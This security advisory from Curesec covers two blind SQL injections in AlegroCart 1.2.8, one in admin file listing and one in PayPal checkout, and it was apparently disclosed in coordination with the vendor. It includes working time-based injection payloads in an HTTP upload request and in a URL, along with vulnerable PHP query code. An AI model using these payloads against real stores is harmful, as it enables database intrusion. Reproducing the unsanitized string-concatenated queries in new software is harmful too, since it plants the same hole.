AlegroCart 1.2.8 - Multiple SQL Injections








Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    AlegroCart 1.2.8
Fixed in:            Patch AC128_fix_17102015
Path Link: 
Vendor Website:
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an

3. BLind SQL Injection (Admin)


Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P


When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.

Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.

Admin credentials are required to exploit this issue.

Proof of Concept

POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865

Content-Disposition: form-data; name="language[1][name]"

Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg


Content-Disposition: form-data; name="mask"

Content-Disposition: form-data; name="remaining"

Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"


will trigger the injected code.


function check_download($filename){
        $result = $this->database->getRow("select * from download where filename = '".$filename."'");
        return $result;

function check_filename($filename){
        $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
        return $results;

function checkFiles() {
        if (!$files) { return; }
        foreach ($files as $file) {
                if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
                        $result = $this->modelDownload->check_download($filename);
                        if (!$result) { $this->init($filename); }

4. BLind SQL Injection (Customer)


Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P


There is an SQL Injection when using Paypal as a payment method during

Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.

Proof of Concept

1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.

The injection can be exploited blind:

http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)

However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.

It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.

It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.


function orderUpdate($status = 'final_order_status', $override = 0) {
    //Find the paid_unconfirmed status id
    $results = $this->getOrderStatusId('order_status_paid_unconfirmed');
    $paidUnconfirmedStatusId = $results?$results:0;
    //Find the final order status id
    $results = $this->getOrderStatusId($status);
    $finalStatusId = $results?$results:0;
    $reference = $this->request->get('ref');
    //Get Order Id
        $res = $this->modelPayment->get_order_id($reference);
    $order_id = $res['order_id'];
    //Update order only if state in paid unconfirmed OR override is set
    if ($order_id) {
if ($override) {
    // Update order status
    $result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
    // Update order_history
    if ($result) {
                                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
} else {
    // Update order status only if status is currently paid_unconfirmed
                        $result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
    // Update order_history
    if ($result)  {
                                $this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');

function get_order_id($reference){
        $result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
        return $result;

function update_order_history($order_id, $finalStatusId,$comment){
        $this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");

function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
        $result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
        return $result;

5. Solution

To mitigate this issue please apply this patch:

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference: